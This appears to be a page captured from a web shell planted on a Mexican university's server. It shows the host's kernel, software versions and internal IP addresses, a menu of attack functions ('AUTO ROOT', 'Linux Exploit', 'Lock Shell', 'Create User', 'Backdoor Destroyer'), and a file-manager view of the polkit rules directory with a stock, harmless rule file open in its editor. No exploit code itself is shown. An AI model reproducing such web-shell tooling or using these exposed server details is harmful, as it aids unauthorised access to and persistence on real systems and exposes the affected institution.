Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
share /
polkit-1 /
rules.d /
[ HOME SHELL ]
Name
Size
Permission
Action
20-gnome-initial-setup.rules
1.15
KB
-rw-r--r--
geoclue-2.0.rules
263
B
-rw-r--r--
gnome-control-center.rules
556
B
-rw-r--r--
org.freedesktop.bolt.rules
368
B
-rw-r--r--
org.freedesktop.fwupd.rules
251
B
-rw-r--r--
org.freedesktop.NetworkManager.rules
261
B
-rw-r--r--
org.freedesktop.packagekit.rules
334
B
-rw-r--r--
org.gtk.vfs.file-operations.rules
594
B
-rw-r--r--
systemd-networkd.rules
527
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 20-gnome-initial-setup.rules
// -*- mode: js; js-indent-level: 4; indent-tabs-mode: nil -*- // // DO NOT EDIT THIS FILE, it will be overwritten on update. // // Allow the gnome-initial-setup user to do certain actions without // being interrupted by password dialogs polkit.addRule(function(action, subject) { if (subject.user !== 'gnome-initial-setup') return undefined; var actionMatches = (action.id.indexOf('org.freedesktop.hostname1.') === 0 || action.id.indexOf('org.freedesktop.NetworkManager.') === 0 || action.id.indexOf('org.freedesktop.locale1.') === 0 || action.id.indexOf('org.freedesktop.accounts.') === 0 || action.id.indexOf('org.freedesktop.timedate1.') === 0 || action.id.indexOf('org.freedesktop.realmd.') === 0 || action.id.indexOf('com.endlessm.ParentalControls.') === 0 || action.id.indexOf('org.fedoraproject.thirdparty.') === 0); if (actionMatches) { if (subject.local) return 'yes'; else return 'auth_admin'; } return undefined; });
Close